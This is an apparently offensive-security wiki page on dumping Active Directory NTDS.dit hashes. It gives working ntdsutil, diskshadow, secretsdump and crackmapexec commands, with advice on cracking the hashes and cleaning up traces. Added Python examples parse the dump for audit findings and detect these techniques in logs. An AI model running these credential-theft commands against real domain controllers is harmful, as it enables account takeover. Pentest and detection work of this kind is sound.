
Dumping NTDS

Last updated 9 months ago

Grab the NTDS File

  • Get the NTDS file using ntdsutil.exe → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

  • Find secretsdump.py in the impacket examples (it will be at /usr/share/doc/python3-impacket/examples/):

python secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile clientntds -hashes LMHASH:NTHASH -user-status LOCAL

  • Clean up the hashes using grep and cut, or whatever you want, so that the output only contains the domain users that are enabled (the -user-status flag appends "(status=Enabled)" / "(status=Disabled)" to every line, and -outputfile clientntds writes the hashes to clientntds.ntds). Something along the lines of

grep Enabled clientntds.ntds | grep acme.com | cut -d " " -f1 > ntds.txt

  • Move ntds.txt to the cracker.

  • Make sure you clean up everything on the DC afterwards (delete the shadow copy, and the ntds.dit and SYSTEM/SECURITY copies you wrote to disk).
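The grep/cut step above, written out as a small parser. This is an added example, not code from the original page or from impacket: it reads the .ntds file secretsdump writes (with the "(status=...)" suffix that -user-status adds), keeps the enabled current accounts of one domain the way the one-liner does, and additionally reports the two findings a password audit of such a dump should surface: accounts that still store an LM hash, and enabled accounts sharing the same NT hash. The SAMPLE lines are constructed and the hash values in them are made up; the acme.com domain name is taken from the one-liner.

```python
"""Reduce secretsdump '.ntds' output (written by -outputfile, with -user-status) to the
enabled domain accounts, then run two audit checks on it.
Added example; SAMPLE is constructed and its hash values are made up."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Well-known LM hash of an empty password; any other value means an LM hash is still stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# One secretsdump hash line: [domain\]user:rid:lmhash:nthash::: (status=Enabled|Disabled)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::(?: \(status=(?P<status>\w+)\))?$"
)

# Constructed sample: bare names are how secretsdump prints accounts without a domain prefix.
SAMPLE = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1111aaaa1111aaaa1111aaaa1111aaaa::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
acme.com\alice:1103:aad3b435b51404eeaad3b435b51404ee:2222bbbb2222bbbb2222bbbb2222bbbb::: (status=Enabled)
acme.com\bob:1104:aad3b435b51404eeaad3b435b51404ee:2222bbbb2222bbbb2222bbbb2222bbbb::: (status=Enabled)
acme.com\carol:1105:3333cccc3333cccc3333cccc3333cccc:4444dddd4444dddd4444dddd4444dddd::: (status=Disabled)
acme.com\bob_history0:1104:aad3b435b51404eeaad3b435b51404ee:5555eeee5555eeee5555eeee5555eeee::: (status=Enabled)
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:6666ffff6666ffff6666ffff6666ffff::: (status=Enabled)
[*] Cleaning up...
"""


@dataclass
class Account:
    domain: Optional[str]   # None when secretsdump prints the name without a domain prefix
    user: str
    rid: int
    lm: str
    nt: str
    enabled: bool

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")

    @property
    def is_history(self) -> bool:
        return re.search(r"_history\d+$", self.user) is not None   # rows added by -history


def parse_secretsdump(text: str) -> List[Account]:
    """One Account per hash line; progress lines and anything else are ignored."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(Account(
                domain=m["domain"], user=m["user"], rid=int(m["rid"]), lm=m["lm"], nt=m["nt"],
                enabled=(m["status"] or "Enabled") == "Enabled",  # no -user-status: treat as enabled
            ))
    return accounts


def enabled_domain_users(accounts: List[Account], domain: str) -> List[Account]:
    """The same selection as 'grep Enabled | grep acme.com' above, minus machine and history rows."""
    return [a for a in accounts
            if a.enabled and a.domain == domain and not a.is_machine and not a.is_history]


def audit(accounts: List[Account]) -> Dict[str, object]:
    """Accounts that still store an LM hash, and enabled accounts sharing one NT hash."""
    lm_stored = sorted(a.user for a in accounts if not a.is_history and a.lm != EMPTY_LM)
    by_nt = defaultdict(list)
    for a in accounts:
        if a.enabled and not a.is_history:
            by_nt[a.nt].append(a.user)
    shared = {nt: sorted(users) for nt, users in by_nt.items() if len(users) > 1}
    return {"lm_stored": lm_stored, "shared_nt": shared}


if __name__ == "__main__":
    accts = parse_secretsdump(SAMPLE)
    print("enabled acme.com users:", [a.user for a in enabled_domain_users(accts, "acme.com")])
    print("audit:", audit(accts))
```

Note that the grep on the domain name drops the bare built-in entries (Administrator, krbtgt, ...) exactly as the one-liner does; the audit functions deliberately look at every row so those accounts are not missed.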

No Credentials - ntdsutil

If you have no domain credentials to use remotely but already have a privileged (local admin) shell on the DC, it's possible to dump the ntds.dit using the lolbin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

ntdsutil writes the ntds.dit together with the SYSTEM and SECURITY registry hives under c:\temp (ntds.dit lands in c:\temp\Active Directory\, the hives in c:\temp\registry\).

We can then dump password hashes offline with impacket:

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntds.dit.

Create a diskshadow script (shadow.txt) that makes a new shadow copy of the C: volume (where ntds.dit is located in our case) and exposes it as drive Z:

shadow.txt

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %trophy% z:

...and now execute the following:

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

ntds.dit has now been extracted into our c:\exfil folder.

Inside the interactive diskshadow utility, delete the shadow copy you exposed (delete shadows volume c: would instead remove every shadow copy of C:, including ones that are not yours):

diskshadow.exe
    > delete shadows exposed z:
    > reset

With Credentials

If you have credentials for an account with replication rights on the domain (a Domain Admin, for example), it's possible to dump hashes from NTDS.dit remotely over RPC using the DRSUAPI replication interface with impacket:

impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6

Using CME

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi
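For the blue-team side of the three techniques on this page, an added detection example (not code from the original page or from any of the tools named). It runs over constructed log records: process-creation events (Sysmon Event ID 1 / Security 4688, reduced here to host, event_id, user and command_line) for the ntdsutil IFM export, the scripted diskshadow run and the copy of ntds.dit out of the exposed shadow volume, and Security 4662 records (subject plus requested property GUIDs) for a non-DC account requesting the replication control-access rights that secretsdump and --ntds drsuapi rely on. The record layout, the host/user names and the list of DC machine accounts are assumptions made for the example; the three replication-right GUIDs are the well-known Active Directory values.

```python
"""Detection logic for the NTDS-dumping techniques on this page, run over constructed
log records. Added example: the record shapes are a reduced stand-in for Sysmon Event ID 1 /
Security 4688 (process creation) and Security 4662 (directory object access), not a log export."""
import re
from typing import Dict, Iterable, List, Tuple

# Control-access-right GUIDs requested by DRSUAPI replication; secretsdump and CME's
# --ntds drsuapi need these, and a non-DC account requesting them is the DCSync signal.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

# Command-line patterns for the local techniques shown above (ntdsutil IFM, diskshadow /s,
# copying ntds.dit out of the exposed shadow volume).
PROCESS_RULES = [
    ("ntdsutil IFM export", re.compile(r"ntdsutil.*\bifm\b", re.I)),
    ("diskshadow scripted run", re.compile(r"diskshadow(\.exe)?\s+/s\b", re.I)),
    ("ntds.dit copied from shadow path", re.compile(r"\bcopy\b.*\\ntds\\ntds\.dit", re.I)),
]

Event = Dict[str, object]
Alert = Tuple[str, int, str]

# Constructed records mirroring the commands on this page, plus two benign ones.
EVENTS: List[Event] = [
    {"host": "DC01", "event_id": 1, "user": "ACME\\jsmith",
     "command_line": 'powershell "ntdsutil.exe \'ac i ntds\' \'ifm\' \'create full c:\\temp\' q q"'},
    {"host": "DC01", "event_id": 1, "user": "ACME\\jsmith",
     "command_line": "diskshadow.exe /s C:\\users\\Administrator\\Desktop\\shadow.txt"},
    {"host": "DC01", "event_id": 1, "user": "ACME\\jsmith",
     "command_line": "cmd.exe /c copy z:\\windows\\ntds\\ntds.dit c:\\exfil\\ntds.dit"},
    {"host": "DC01", "event_id": 1, "user": "ACME\\jsmith",
     "command_line": "cmd.exe /c copy c:\\reports\\q1.xlsx \\\\fileserver\\share\\"},   # benign
    {"host": "DC01", "event_id": 4662, "subject": "ACME\\jsmith",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"host": "DC01", "event_id": 4662, "subject": "ACME\\DC02$",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},   # benign: DC-to-DC replication
]


def check_process_event(ev: Event) -> List[str]:
    """Names of the process rules that match this record's command line."""
    cmd = str(ev.get("command_line", ""))
    return [name for name, rx in PROCESS_RULES if rx.search(cmd)]


def check_4662(ev: Event, dc_accounts: Iterable[str]) -> List[str]:
    """Flag a 4662 whose requested properties include replication rights, unless the
    subject is a known domain controller machine account."""
    subject = str(ev.get("subject", "")).upper()
    if subject in {d.upper() for d in dc_accounts}:
        return []
    requested = set(GUID_RE.findall(str(ev.get("properties", "")).lower()))
    return ["replication rights requested by non-DC account"] if requested & REPLICATION_GUIDS else []


def detect(events: Iterable[Event], dc_accounts: Iterable[str]) -> List[Alert]:
    """Run both checks over a stream of records; returns (host, event_id, rule) per hit."""
    dc_accounts = set(dc_accounts)
    alerts: List[Alert] = []
    for ev in events:
        host, eid = str(ev["host"]), int(ev["event_id"])
        if eid in (1, 4688):
            alerts.extend((host, eid, name) for name in check_process_event(ev))
        elif eid == 4662:
            alerts.extend((host, eid, name) for name in check_4662(ev, dc_accounts))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS, {"ACME\\DC01$", "ACME\\DC02$"}):
        print(alert)
```

The 4662 check only produces signal if auditing of directory service access is enabled on the DCs and the domain object carries a SACL for the replication rights; without that, the remote dump leaves no 4662 at all, which is why the process-creation rules and the 4662 rule belong together.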
